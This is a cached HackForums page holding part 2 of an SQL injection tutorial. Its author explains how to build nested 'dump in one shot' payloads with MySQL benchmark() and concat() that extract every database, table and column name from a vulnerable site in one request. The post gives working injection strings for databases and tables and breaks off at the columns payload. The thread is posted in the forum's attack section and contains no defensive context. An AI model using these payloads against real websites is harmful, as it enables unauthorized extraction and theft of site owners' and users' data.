<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><script src="%5BSQLi%20tutorial%5D%20dump%20in%20one%20shot%20with%20Benchmark%28%29%20-%20part%20%232%20-%20Page%201_files/bmi.js" language="javascript"></script><!-- base href="http://www.hackforums.net/showthread.php?tid=4137953" --></head><body><div style="background:#fff;border:1px solid #999;margin:-1px -1px 0;padding:0;"><div style="background:#ddd;border:1px solid #999;color:#000;font:13px arial,sans-serif;font-weight:normal;margin:12px;padding:8px;text-align:left">This is Google's cache of <a href="http://www.hackforums.net/showthread.php?tid=4137953" style="text-decoration:underline;color:#00c">http://www.hackforums.net/showthread.php?tid=4137953</a>. It is a snapshot of the page as it appeared on 27 Mar 2014 22:38:09 GMT. The <a href="http://www.hackforums.net/showthread.php?tid=4137953" style="text-decoration:underline;color:#00c">current page</a> could have changed in the meantime. <a href="http://support.google.com/websearch/bin/answer.py?hl=en&amp;p=cached&amp;answer=1687222" style="text-decoration:underline;color:#00c">Learn more</a><br>Tip: To quickly find your search term on this page, press <b>Ctrl+F</b> or <b>⌘-F</b> (Mac) and use the find bar.<br><br><div style="float:right"><a href="http://webcache.googleusercontent.com/search?q=cache:iqvUj8OGm_cJ:www.hackforums.net/showthread.php%3Ftid%3D4137953&amp;hl=en&amp;gl=in&amp;strip=1" style="text-decoration:underline;color:#00c">Text-only version</a></div><div>&nbsp;</div></div></div><div style="position:relative"><title>[SQLi tutorial] dump in one shot with Benchmark() - part #2 - Page 1</title> <meta name="description" content="SQL Injection Attacks-[SQLi tutorial] dump in one shot with Benchmark() - part #2"><link rel="canonical" href="http://www.hackforums.net/showthread.php?tid=4137953"><meta http-equiv="X-UA-Compatible" content="IE=8"><link rel="alternate" type="application/rss+xml" title="Latest Threads (RSS 2.0)" href="http://www.hackforums.net/syndication.php"><link rel="alternate" type="application/atom+xml" title="Latest Threads (Atom 1.0)" href="http://www.hackforums.net/syndication.php?type=atom1.0"><link rel="image_src" href="http://x.hackforums.net/images/avatars/Hardstyle2.png"><link rel="apple-touch-icon" href="http://x.hackforums.net/apple-touch-icon-precomposed.png"><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta http-equiv="Content-Script-Type" content="text/javascript"><script type="text/javascript" src="%5BSQLi%20tutorial%5D%20dump%20in%20one%20shot%20with%20Benchmark%28%29%20-%20part%20%232%20-%20Page%201_files/prototype.js"></script> <script type="text/javascript" src="%5BSQLi%20tutorial%5D%20dump%20in%20one%20shot%20with%20Benchmark%28%29%20-%20part%20%232%20-%20Page%201_files/general.js"></script> <script type="text/javascript" src="%5BSQLi%20tutorial%5D%20dump%20in%20one%20shot%20with%20Benchmark%28%29%20-%20part%20%232%20-%20Page%201_files/popup_menu.js"></script> <link type="text/css" rel="stylesheet" href="%5BSQLi%20tutorial%5D%20dump%20in%20one%20shot%20with%20Benchmark%28%29%20-%20part%20%232%20-%20Page%201_files/global.css"><link type="text/css" rel="stylesheet" href="%5BSQLi%20tutorial%5D%20dump%20in%20one%20shot%20with%20Benchmark%28%29%20-%20part%20%232%20-%20Page%201_files/star_ratings.css"><link type="text/css" rel="stylesheet" href="%5BSQLi%20tutorial%5D%20dump%20in%20one%20shot%20with%20Benchmark%28%29%20-%20part%20%232%20-%20Page%201_files/showthread.css"><script type="text/javascript"><!--
	var cookieDomain = ".hackforums.net";
	var cookiePath = "/";
	var cookiePrefix = "";
	var deleteevent_confirm = "Are you sure you want to delete this event?";
	var removeattach_confirm = "Are you sure you want to remove the selected attachment from this post?";
	var loading_text = 'Loading. <br />Please Wait..';
	var saving_changes = 'Saving changes..';
	var use_xmlhttprequest = "1";
	var my_post_key = "f54c7ca2b9f607627cb9306cf37f1b0f";
	var imagepath = "http://x.hackforums.net/images/modern_bl";
// -->
</script> <script type="text/javascript" src="%5BSQLi%20tutorial%5D%20dump%20in%20one%20shot%20with%20Benchmark%28%29%20-%20part%20%232%20-%20Page%201_files/tabcontent.js">/***********************************************
* Tab Content script v2.2- copyright Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Drive at http://www.dynamicdrive.com/ for full source code
***********************************************/
</script> <!--//--><script type="text/javascript"><!--
	var quickdelete_confirm = "Are you sure you want to delete this post?";
// -->
</script> <script type="text/javascript" src="%5BSQLi%20tutorial%5D%20dump%20in%20one%20shot%20with%20Benchmark%28%29%20-%20part%20%232%20-%20Page%201_files/thread.js"></script> <!--//--><div id="container"><div class="largetext">Welcome to HackForums.net<span class="smalltext float_right"><strong>Current time:</strong> 03-27-2014, 02:38 PM</span></div><a name="top" id="top"></a><div id="header"><div class="logo"><a href="http://www.hackforums.net/"><img src="%5BSQLi%20tutorial%5D%20dump%20in%20one%20shot%20with%20Benchmark%28%29%20-%20part%20%232%20-%20Page%201_files/logo_bl.gif" alt="Hack Forums" title="Hack Forums"></a></div><div class="menu"><ul><li><a href="http://www.hackforums.net/" class="navButton">Home</a></li> <li><a href="http://www.hackforums.net/upgrade.php" class="navButton">Upgrade</a></li> <li><a href="http://www.hackforums.net/search.php" class="navButton">Search</a></li> <li><a href="http://www.hackforums.net/memberlist.php" class="navButton">Members</a></li> <li><a href="http://www.hackforums.net/extras.php" class="navButton">Extras</a></li> <li><a href="http://www.hackforums.net/misc.php?action=help" class="navButton">Help</a></li> <li><a href="http://twitter.com/hackforumsnet" class="navButton">Follow</a></li> <li><a href="http://www.hackforums.net/contact.php" class="navButton">Contact</a></li></ul></div><hr class="hidden"><div id="panel"><span id="quick_login">Hello There, Guest! (<a href="http://www.hackforums.net/member.php?action=login">Login</a> — <a href="http://www.hackforums.net/member.php?action=register">Register</a>)</span></div></div><!--//
 <br />

<div class="pm_alert"> &nbsp;</div>
--><hr class="hidden"><br class="clear"><div id="content"><div class="navigation"><a href="http://www.hackforums.net/index.php">Hack Forums</a> / <a href="http://www.hackforums.net/forumdisplay.php?fid=45">Hacks, Exploits, and Various Discussions</a> / <a href="http://www.hackforums.net/forumdisplay.php?fid=43">Website and Forum Hacking</a> / <a href="http://www.hackforums.net/forumdisplay.php?fid=103">SQL Injection Attacks</a> / <span class="active">[SQLi tutorial] dump in one shot with Benchmark() - part #2</span></div><br><div class="quick_keys"><div class="float_left"></div><div class="float_right" style="padding: 5px 2px;"><a href="http://www.hackforums.net/newreply.php?tid=4137953" class="bitButton" rel="nofollow" title="Post Reply">New Reply</a></div><div style="margin-top: 6px; padding-right: 10px;" class="float_right"><script type="text/javascript" src="%5BSQLi%20tutorial%5D%20dump%20in%20one%20shot%20with%20Benchmark%28%29%20-%20part%20%232%20-%20Page%201_files/rating.js"></script><div id="success_rating_4137953" style="float: left; padding-top: 2px; padding-right: 10px;">&nbsp;</div><strong style="float: left; padding-right: 10px;">Thread Rating:</strong><div class="inline_rating"><ul class="star_rating star_rating_notrated" id="rating_thread_4137953"><li style="width: 0%" class="current_rating" id="current_rating_4137953">0 Votes - 0 Average</li> <li><a class="one_star" title="1 star out of 5" href="http://www.hackforums.net/ratethread.php?tid=4137953&amp;rating=1&amp;my_post_key=f54c7ca2b9f607627cb9306cf37f1b0f" rel="nofollow">1</a></li> <li><a class="two_stars" title="2 stars out of 5" href="http://www.hackforums.net/ratethread.php?tid=4137953&amp;rating=2&amp;my_post_key=f54c7ca2b9f607627cb9306cf37f1b0f" rel="nofollow">2</a></li> <li><a class="three_stars" title="3 stars out of 5" href="http://www.hackforums.net/ratethread.php?tid=4137953&amp;rating=3&amp;my_post_key=f54c7ca2b9f607627cb9306cf37f1b0f" rel="nofollow">3</a></li> <li><a class="four_stars" title="4 stars out of 5" href="http://www.hackforums.net/ratethread.php?tid=4137953&amp;rating=4&amp;my_post_key=f54c7ca2b9f607627cb9306cf37f1b0f" rel="nofollow">4</a></li> <li><a class="five_stars" title="5 stars out of 5" href="http://www.hackforums.net/ratethread.php?tid=4137953&amp;rating=5&amp;my_post_key=f54c7ca2b9f607627cb9306cf37f1b0f" rel="nofollow">5</a></li></ul></div></div><!--//--><table class="tborder" style="clear: both; border-bottom-width: 0;" border="0" cellpadding="4" cellspacing="1"><tbody><tr><td class="thead" colspan="2"><div class="float_right"><a href="#top" id="thread_options_4137953" class="smalltext"><strong>Thread Options</strong></a><div id="thread_options_4137953_popup" class="popup_menu" style="display: none;"><div class="popup_item_container thread_options"><a href="http://www.hackforums.net/printthread.php?tid=4137953" class="popup_item">View a Printable Version</a></div><div class="popup_item_container thread_options"><a href="http://www.hackforums.net/usercp2.php?action=addsubscription&amp;tid=4137953&amp;my_post_key=f54c7ca2b9f607627cb9306cf37f1b0f" class="popup_item" rel="nofollow">Subscribe to this thread</a></div></div></div><script type="text/javascript"><!--
    new PopupMenu("thread_options_4137953");
// -->
</script><div><strong>[SQLi tutorial] dump in one shot with Benchmark() - part #2</strong></div></td></tr></tbody></table><div id="posts"><!--//--><a name="pid39141608" id="pid39141608"></a><table class="tborder" style="border-top-width: 0; " id="post_39141608" border="0" cellpadding="4" cellspacing="1"><tbody><tr><td class="tcat"><div class="float_left smalltext">Today, 01:18 PM <span id="edited_by_39141608"><span class="smalltext">(This post was last modified: Today 01:55 PM by <a href="http://www.hackforums.net/member.php?action=profile&amp;uid=949543">ajkaro</a>.)</span> </span></div><div style="float: right; width: auto; vertical-align: top"><span class="smalltext"><strong>Post: <a href="http://www.hackforums.net/showthread.php?tid=4137953&amp;pid=39141608#pid39141608">#1</a></strong></span></div></td></tr><tr><td class="trow1 "><table style="width: 100%;" border="0" cellpadding="0" cellspacing="0"><tbody><tr><td class="post_avatar" style="padding-right: 10px;" width="1"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=949543"><img src="%5BSQLi%20tutorial%5D%20dump%20in%20one%20shot%20with%20Benchmark%28%29%20-%20part%20%232%20-%20Page%201_files/avatar_949543.png" alt="" height="100" width="100"></a></td><td class="post_author"><strong><span class="largetext"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=949543"><span class="group29">ajkaro</span></a></span></strong> <img src="%5BSQLi%20tutorial%5D%20dump%20in%20one%20shot%20with%20Benchmark%28%29%20-%20part%20%232%20-%20Page%201_files/buddy_offline.gif" title="Offline" alt="Offline"><br><span class="smalltext">Ub3r Member<br><span class="userstars"><img src="%5BSQLi%20tutorial%5D%20dump%20in%20one%20shot%20with%20Benchmark%28%29%20-%20part%20%232%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5BSQLi%20tutorial%5D%20dump%20in%20one%20shot%20with%20Benchmark%28%29%20-%20part%20%232%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5BSQLi%20tutorial%5D%20dump%20in%20one%20shot%20with%20Benchmark%28%29%20-%20part%20%232%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5BSQLi%20tutorial%5D%20dump%20in%20one%20shot%20with%20Benchmark%28%29%20-%20part%20%232%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5BSQLi%20tutorial%5D%20dump%20in%20one%20shot%20with%20Benchmark%28%29%20-%20part%20%232%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5BSQLi%20tutorial%5D%20dump%20in%20one%20shot%20with%20Benchmark%28%29%20-%20part%20%232%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5BSQLi%20tutorial%5D%20dump%20in%20one%20shot%20with%20Benchmark%28%29%20-%20part%20%232%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><br></span><img src="%5BSQLi%20tutorial%5D%20dump%20in%20one%20shot%20with%20Benchmark%28%29%20-%20part%20%232%20-%20Page%201_files/ub3r.png" alt="HF Ub3r" title="HF Ub3r"> </span></td><td class="smalltext post_author_info" width="165">Prestige: 137<br>Posts: 2,174<br>Joined: Aug 2011<br>Reputation: <a href="http://www.hackforums.net/reputation.php?uid=949543"><strong class="reputation_positive">221</strong></a><br><span style="white-space:normal; width: 100%;"><img src="%5BSQLi%20tutorial%5D%20dump%20in%20one%20shot%20with%20Benchmark%28%29%20-%20part%20%232%20-%20Page%201_files/blue_diamond.png" alt="Sapphire of Ub3r" title="Sapphire of Ub3r"></span></td></tr></tbody></table></td></tr><tr><td class="trow2 post_content "><div class="post_body" id="pid_39141608">In <a href="http://www.hackforums.net/showthread.php?tid=4134016" target="_blank"><span style="text-decoration: underline;">part #1</span></a> of this tutorial I explained how to use function <span style="color: #32CD32;"><span style="font-weight: bold;">Benchmark()</span> </span>for <span style="color: #FFD700;">dump in one shot (DIOS)</span>. See in my tutorials what DIOS is - starting <a href="http://www.hackforums.net/showthread.php?tid=3487536" target="_blank"><span style="text-decoration: underline;">here</span></a>.<br><br>In this part #2 we well talk about <span style="color: #FFA500;">more complex</span> use of <span style="color: #FFD700;">DIOS with Benchmark()</span>.<br><br>That
 syntax is used to dump complete data (about 
databases/tables/columns/data from columns) in only one code execution. 
Syntax is very powerful, because we get maximum data in smallest 
injections count.<br><br>Have you ever tried with complete dump of all 
databases, all tables within each database and all columns within every 
table? Challenge <a href="http://www.hackforums.net/showthread.php?tid=4023034" target="_blank"><span style="text-decoration: underline;">#88</span></a> was perfect for that <img src="%5BSQLi%20tutorial%5D%20dump%20in%20one%20shot%20with%20Benchmark%28%29%20-%20part%20%232%20-%20Page%201_files/pirate.gif" style="vertical-align: middle;" alt="Pirate" title="Pirate" border="0"><br><br>When we think about that impressive task (there was <span style="font-size: large;"><span style="color: #32CD32;">5823 </span></span>lines in SQLi output) in only one code execution we first think of DIOS.<br><br>Because
 data for tables from each database should be presented after each 
database name and data about columns from each table right after each 
table, logical solution would be something like this pseudo code:<br><div class="codeblock"><div class="title">Code:<br></div><div class="body" dir="ltr"><code>(<br>DIOS with output database names (from D#1 to D#xx),<br>&nbsp;&nbsp;(&nbsp;&nbsp;<br>&nbsp;&nbsp; DIOS with output table names (from T#1 to T#yy) for each database (from D#1 to D#xx)<br>&nbsp;&nbsp;&nbsp;&nbsp;(<br>&nbsp;&nbsp;&nbsp;&nbsp;
 DIOS with output column names (from C#1 to C#zz) for each table (from 
T#1 to T#yy) in database (from D#1 to D#xx)<br>&nbsp;&nbsp;&nbsp;&nbsp;)<br>&nbsp;&nbsp;)<br>)</code></div></div><br>It is triple DIOS syntax. Or even better to say <span style="font-weight: bold;"><span style="color: #00BFFF;">DIOS with two nested DIOS</span></span>. In <span style="color: #FFD700;">first DIOS</span> right after <span style="color: #FFD700;">schema_name</span> we started new nested <span style="color: #32CD32;">(second) DIOS for table_name</span> for that database and after <span style="color: #32CD32;">table_name</span> we started another nested <span style="color: #00BFFF;">(third) DIOS for column names</span> of that table.<br><br>That
 maybe sounds a little complicated for those of you not familiar with 
coding in any computer language. But it is not. It is simple three 
levels loop like:<br><div class="codeblock phpcodeblock"><div class="title">PHP Code:<br></div><div class="body"><div dir="ltr"><code><span style="color: #7AC07C">for&nbsp;</span><span style="color: #66CCFF">i</span><span style="color: #7AC07C">:=&nbsp;</span><span style="color: #66CCFF">1&nbsp;to&nbsp;xx&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #FFCCCC">//iterations&nbsp;for&nbsp;all&nbsp;databases<br>&nbsp;&nbsp;</span><span style="color: #7AC07C">for&nbsp;</span><span style="color: #66CCFF">j</span><span style="color: #7AC07C">:=&nbsp;</span><span style="color: #66CCFF">1&nbsp;to&nbsp;yy&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #FFCCCC">//iterations&nbsp;for&nbsp;all&nbsp;tables&nbsp;within&nbsp;each&nbsp;database<br>&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #7AC07C">for&nbsp;</span><span style="color: #66CCFF">k</span><span style="color: #7AC07C">:=</span><span style="color: #66CCFF">1&nbsp;to&nbsp;zz&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #FFCCCC">//iterations&nbsp;for&nbsp;all&nbsp;column&nbsp;names&nbsp;within&nbsp;each&nbsp;table&nbsp;<br></span></code></div></div></div><br>That <span style="color: #FFA500;">triple loop</span> will give us first database (level <span style="font-weight: bold;"><span style="color: #FFD700;">i</span></span>), within that database first table name (level <span style="font-weight: bold;"><span style="color: #32CD32;">j</span></span>) and within that table name all column names (level <span style="font-weight: bold;"><span style="color: #00BFFF;">k</span></span>). When level <span style="font-weight: bold;"><span style="color: #00BFFF;">k</span></span> is finished we skip to next table in level <span style="font-weight: bold;"><span style="color: #32CD32;">j</span></span> and for that table all columns (level <span style="font-weight: bold;"><span style="color: #00BFFF;">k</span></span>) are displayed. When all tables (and their columns) are displayed we moved in first level (<span style="font-weight: bold;"><span style="color: #FFD700;">i</span></span>) again to next database and complete procedure is repeated with first table in new database (and its columns)...<br><br>We already know all DIOS syntax for:<br><br><span style="color: #FFD700;">A - databases:</span><br><div class="codeblock phpcodeblock"><div class="title">PHP Code:<br></div><div class="body"><div dir="ltr"><code><span style="color: #7AC07C">(</span><span style="color: #66CCFF">select</span><span style="color: #7AC07C">(@</span><span style="color: #66CCFF">x</span><span style="color: #7AC07C">)</span><span style="color: #66CCFF">from</span><span style="color: #7AC07C">(</span><span style="color: #66CCFF">select</span><span style="color: #7AC07C">(@</span><span style="color: #66CCFF">x</span><span style="color: #7AC07C">:=</span><span style="color: #66CCFF">0x00</span><span style="color: #7AC07C">),(@</span><span style="color: #66CCFF">sch</span><span style="color: #7AC07C">:=</span><span style="color: #66CCFF">0x00</span><span style="color: #7AC07C">),(</span><span style="color: #66CCFF">select</span><span style="color: #7AC07C">(</span><span style="color: #66CCFF">0</span><span style="color: #7AC07C">)</span><span style="color: #66CCFF">from</span><span style="color: #7AC07C">(</span><span style="color: #66CCFF">information_schema</span><span style="color: #7AC07C">.</span><span style="color: #66CCFF">schemata</span><span style="color: #7AC07C">)<br></span><span style="color: #66CCFF">where</span><span style="color: #7AC07C">(</span><span style="color: #66CCFF">0x00</span><span style="color: #7AC07C">)</span><span style="color: #66CCFF">in</span><span style="color: #7AC07C">(@</span><span style="color: #66CCFF">x</span><span style="color: #7AC07C">:=</span><span style="color: #66CCFF">concat</span><span style="color: #7AC07C">(@</span><span style="color: #66CCFF">x</span><span style="color: #7AC07C">,</span><span style="color: #66CCFF">0x3c62723e</span><span style="color: #7AC07C">,(@</span><span style="color: #66CCFF">sch</span><span style="color: #7AC07C">:=</span><span style="color: #66CCFF">schema_name</span><span style="color: #7AC07C">)))))</span><span style="color: #66CCFF">x</span><span style="color: #7AC07C">)&nbsp;<br></span></code></div></div></div>We stored actual schema name in each iteration in local variable <span style="color: #FFA500;">@sch</span>, because we will need it later for displaying tables from that database.<br><br><span style="color: #32CD32;">B - tables:</span><br><div class="codeblock phpcodeblock"><div class="title">PHP Code:<br></div><div class="body"><div dir="ltr"><code><span style="color: #7AC07C">(</span><span style="color: #66CCFF">select</span><span style="color: #7AC07C">(@</span><span style="color: #66CCFF">y</span><span style="color: #7AC07C">)</span><span style="color: #66CCFF">from</span><span style="color: #7AC07C">(</span><span style="color: #66CCFF">select</span><span style="color: #7AC07C">(@</span><span style="color: #66CCFF">y</span><span style="color: #7AC07C">:=</span><span style="color: #66CCFF">0x00</span><span style="color: #7AC07C">),(@</span><span style="color: #66CCFF">tbl</span><span style="color: #7AC07C">:=</span><span style="color: #66CCFF">0x00</span><span style="color: #7AC07C">),(</span><span style="color: #66CCFF">select</span><span style="color: #7AC07C">(</span><span style="color: #66CCFF">0</span><span style="color: #7AC07C">)</span><span style="color: #66CCFF">from</span><span style="color: #7AC07C">(</span><span style="color: #66CCFF">information_schema</span><span style="color: #7AC07C">.</span><span style="color: #66CCFF">tables</span><span style="color: #7AC07C">)<br></span><span style="color: #66CCFF">where</span><span style="color: #7AC07C">(</span><span style="color: #66CCFF">table_schema</span><span style="color: #7AC07C">=</span><span style="color: #66CCFF">some_database_name</span><span style="color: #7AC07C">)and(</span><span style="color: #66CCFF">0x00</span><span style="color: #7AC07C">)</span><span style="color: #66CCFF">in</span><span style="color: #7AC07C">(@</span><span style="color: #66CCFF">y</span><span style="color: #7AC07C">:=</span><span style="color: #66CCFF">concat</span><span style="color: #7AC07C">(@</span><span style="color: #66CCFF">y</span><span style="color: #7AC07C">,</span><span style="color: #66CCFF">0x3c62723e</span><span style="color: #7AC07C">,(@</span><span style="color: #66CCFF">tbl</span><span style="color: #7AC07C">:=</span><span style="color: #66CCFF">table_name</span><span style="color: #7AC07C">)))))</span><span style="color: #66CCFF">y</span><span style="color: #7AC07C">)&nbsp;<br></span></code></div></div></div>We stored actual table name in each iteration in local variable <span style="color: #FFA500;">@tbl</span>, because we will need it later for displaying columns from that table.<br><br><span style="color: #00BFFF;">C - columns:</span><br><div class="codeblock phpcodeblock"><div class="title">PHP Code:<br></div><div class="body"><div dir="ltr"><code><span style="color: #7AC07C">(</span><span style="color: #66CCFF">select</span><span style="color: #7AC07C">(@</span><span style="color: #66CCFF">z</span><span style="color: #7AC07C">)</span><span style="color: #66CCFF">from</span><span style="color: #7AC07C">(</span><span style="color: #66CCFF">select</span><span style="color: #7AC07C">(@</span><span style="color: #66CCFF">z</span><span style="color: #7AC07C">:=</span><span style="color: #66CCFF">0x00</span><span style="color: #7AC07C">),(</span><span style="color: #66CCFF">select</span><span style="color: #7AC07C">(</span><span style="color: #66CCFF">0</span><span style="color: #7AC07C">)</span><span style="color: #66CCFF">from</span><span style="color: #7AC07C">(</span><span style="color: #66CCFF">information_schema</span><span style="color: #7AC07C">.</span><span style="color: #66CCFF">columns</span><span style="color: #7AC07C">)<br></span><span style="color: #66CCFF">where</span><span style="color: #7AC07C">(</span><span style="color: #66CCFF">table_schema</span><span style="color: #7AC07C">=</span><span style="color: #66CCFF">database</span><span style="color: #7AC07C">())and(</span><span style="color: #66CCFF">table_name</span><span style="color: #7AC07C">=</span><span style="color: #66CCFF">some_table_name</span><span style="color: #7AC07C">)and(</span><span style="color: #66CCFF">0x00</span><span style="color: #7AC07C">)</span><span style="color: #66CCFF">in</span><span style="color: #7AC07C">(@</span><span style="color: #66CCFF">z</span><span style="color: #7AC07C">:=</span><span style="color: #66CCFF">concat</span><span style="color: #7AC07C">(@</span><span style="color: #66CCFF">z</span><span style="color: #7AC07C">,</span><span style="color: #66CCFF">0x3c62723e</span><span style="color: #7AC07C">,</span><span style="color: #66CCFF">column_name</span><span style="color: #7AC07C">))))</span><span style="color: #66CCFF">z</span><span style="color: #7AC07C">)&nbsp;<br></span></code></div></div></div><br>If we follow our pseudo code from top of this tutorial we will insert complete code from part <span style="color: #32CD32;">B</span> right after <span style="color: #FFA500;">(@sch:=schema_name)</span> in code from part <span style="color: #FFD700;">A</span>. And part from <span style="color: #00BFFF;">C</span> right after <span style="color: #FFA500;">(@tbl:=table_name)</span> in part <span style="color: #32CD32;">B</span>. We will replace <span style="color: #FF1493;">some_database_name</span> with actual database stored in variable <span style="color: #FF1493;">@sch</span> and <span style="color: #FF1493;">some_table_name</span> with actual table name stored in variable <span style="color: #FF1493;">@tbl</span>.<br><br><span style="color: #FF0000;"><span style="font-weight: bold;">Guess what. It won't work</span></span> <img src="%5BSQLi%20tutorial%5D%20dump%20in%20one%20shot%20with%20Benchmark%28%29%20-%20part%20%232%20-%20Page%201_files/blush.gif" style="vertical-align: middle;" alt="Blush" title="Blush" border="0"><img src="%5BSQLi%20tutorial%5D%20dump%20in%20one%20shot%20with%20Benchmark%28%29%20-%20part%20%232%20-%20Page%201_files/confused.gif" style="vertical-align: middle;" alt="Confused" title="Confused" border="0"><img src="%5BSQLi%20tutorial%5D%20dump%20in%20one%20shot%20with%20Benchmark%28%29%20-%20part%20%232%20-%20Page%201_files/bebe-pleure.gif" style="vertical-align: middle;" alt="Bebe-pleure" title="Bebe-pleure" border="0"><br><br><span style="color: #FF0000;"><span style="font-weight: bold;">Standard DIOS doesn't allow us to transfer data from variable in first DIOS to code in our second or third DIOS.</span></span>
 I was trying everything over and over again but couldn't do it. Also 
didn't see anybody else did it... It seems those variables are local to 
each DIOS. Although I tried with initializing them outside of any DIOS. 
No luck.<br><br>Without data from those variables we can't make our command for tables in second DIOS where we need syntax:<br><br><span style="color: #32CD32;">...select(0)from(information_schema.tables)where(table_schema=</span><span style="color: #FF1493;">@sch</span><span style="color: #32CD32;">)...</span><br><br>or in our third DIOS in part for columns:<br><br><span style="color: #32CD32;">...select(0)from(information_schema.columns)where(table_schema=</span><span style="color: #FF1493;">@sch</span><span style="color: #32CD32;">)and(table_name=</span><span style="color: #FF1493;">@tbl</span><span style="color: #32CD32;">)...</span><br><br><hr><br><span style="color: #FFA500;"><span style="font-size: large;"><span style="font-weight: bold;">So why that tutorial if it doesn't work?</span></span></span> <img src="%5BSQLi%20tutorial%5D%20dump%20in%20one%20shot%20with%20Benchmark%28%29%20-%20part%20%232%20-%20Page%201_files/confused.gif" style="vertical-align: middle;" alt="Confused" title="Confused" border="0"><br><br><span style="color: #32CD32;">Well here comes the good news.</span> That triple (nested) DIOS scenario works when we use <span style="color: #FFD700;">Benchmark()</span> in DIOS. <img src="%5BSQLi%20tutorial%5D%20dump%20in%20one%20shot%20with%20Benchmark%28%29%20-%20part%20%232%20-%20Page%201_files/yeye.gif" style="vertical-align: middle;" alt="Yeye" title="Yeye" border="0"><br><br>So all explanation above is valid. What we need is replacing standard DIOS with Benchmark based DIOS. <span style="color: #FFA500;">In benchmark based DIOS we can transfer data from variables in different nested DIOS.</span><br><br><span style="color: #FFD700;">A - databases:</span><br><div class="codeblock phpcodeblock"><div class="title">PHP Code:<br></div><div class="body"><div dir="ltr"><code><span style="color: #66CCFF">concat</span><span style="color: #7AC07C">(@</span><span style="color: #66CCFF">sch</span><span style="color: #7AC07C">:=</span><span style="color: #66CCFF">0x00</span><span style="color: #7AC07C">,@</span><span style="color: #66CCFF">o</span><span style="color: #7AC07C">:=</span><span style="color: #66CCFF">0x3c62723e</span><span style="color: #7AC07C">,</span><span style="color: #66CCFF">benchmark</span><span style="color: #7AC07C">((</span><span style="color: #66CCFF">select&nbsp;count</span><span style="color: #7AC07C">(*)&nbsp;</span><span style="color: #66CCFF">from&nbsp;information_schema</span><span style="color: #7AC07C">.</span><span style="color: #66CCFF">schemata</span><span style="color: #7AC07C">),<br>@</span><span style="color: #66CCFF">o</span><span style="color: #7AC07C">:=</span><span style="color: #66CCFF">CONCAT</span><span style="color: #7AC07C">(@</span><span style="color: #66CCFF">o</span><span style="color: #7AC07C">,</span><span style="color: #66CCFF">0x3c62723e</span><span style="color: #7AC07C">,(</span><span style="color: #66CCFF">Select&nbsp;</span><span style="color: #7AC07C">(@</span><span style="color: #66CCFF">sch</span><span style="color: #7AC07C">:=</span><span style="color: #66CCFF">schema_name</span><span style="color: #7AC07C">)&nbsp;</span><span style="color: #66CCFF">from&nbsp;information_schema</span><span style="color: #7AC07C">.</span><span style="color: #66CCFF">schemata&nbsp;<br>where&nbsp;schema_name</span><span style="color: #7AC07C">&gt;@</span><span style="color: #66CCFF">sch&nbsp;order&nbsp;by&nbsp;schema_name&nbsp;LIMIT&nbsp;1</span><span style="color: #7AC07C">))),@</span><span style="color: #66CCFF">o</span><span style="color: #7AC07C">)&nbsp;<br></span></code></div></div></div>We stored actual schema name in local variable <span style="color: #FFA500;">@sch</span>, because we will need it later for displaying tables from that database.<br><br><span style="color: #32CD32;">B - tables:</span><br><div class="codeblock phpcodeblock"><div class="title">PHP Code:<br></div><div class="body"><div dir="ltr"><code><span style="color: #66CCFF">concat</span><span style="color: #7AC07C">(@</span><span style="color: #66CCFF">tbl</span><span style="color: #7AC07C">:=</span><span style="color: #66CCFF">0x00</span><span style="color: #7AC07C">,@</span><span style="color: #66CCFF">tbl_out</span><span style="color: #7AC07C">:=</span><span style="color: #66CCFF">0x3c62723e</span><span style="color: #7AC07C">,</span><span style="color: #66CCFF">benchmark</span><span style="color: #7AC07C">((</span><span style="color: #66CCFF">select&nbsp;count</span><span style="color: #7AC07C">(*)&nbsp;</span><span style="color: #66CCFF">from&nbsp;information_schema</span><span style="color: #7AC07C">.</span><span style="color: #66CCFF">tables&nbsp;<br>where&nbsp;table_schema</span><span style="color: #7AC07C">=</span><span style="color: #66CCFF">some_database_name</span><span style="color: #7AC07C">),<br>@</span><span style="color: #66CCFF">tbl_out</span><span style="color: #7AC07C">:=</span><span style="color: #66CCFF">CONCAT</span><span style="color: #7AC07C">(@</span><span style="color: #66CCFF">tbl_out</span><span style="color: #7AC07C">,</span><span style="color: #66CCFF">0x3c62723e</span><span style="color: #7AC07C">,(</span><span style="color: #66CCFF">Select&nbsp;</span><span style="color: #7AC07C">(@</span><span style="color: #66CCFF">tbl</span><span style="color: #7AC07C">:=</span><span style="color: #66CCFF">table_name</span><span style="color: #7AC07C">)&nbsp;</span><span style="color: #66CCFF">from&nbsp;information_schema</span><span style="color: #7AC07C">.</span><span style="color: #66CCFF">tables&nbsp;<br>where&nbsp;table_schema</span><span style="color: #7AC07C">=</span><span style="color: #66CCFF">some_database_name&nbsp;</span><span style="color: #7AC07C">and&nbsp;</span><span style="color: #66CCFF">table_name</span><span style="color: #7AC07C">&gt;@</span><span style="color: #66CCFF">tbl&nbsp;order&nbsp;by&nbsp;table_name&nbsp;LIMIT&nbsp;1</span><span style="color: #7AC07C">))),@</span><span style="color: #66CCFF">tbl_out</span><span style="color: #7AC07C">)&nbsp;<br></span></code></div></div></div>We stored actual table name in local variable <span style="color: #FFA500;">@tbl</span>, because we will need it later for displaying columns from that table.<br><br><span style="color: #00BFFF;">C - columns</span><br><div class="codeblock phpcodeblock"><div class="title">PHP Code:<br></div><div class="body"><div 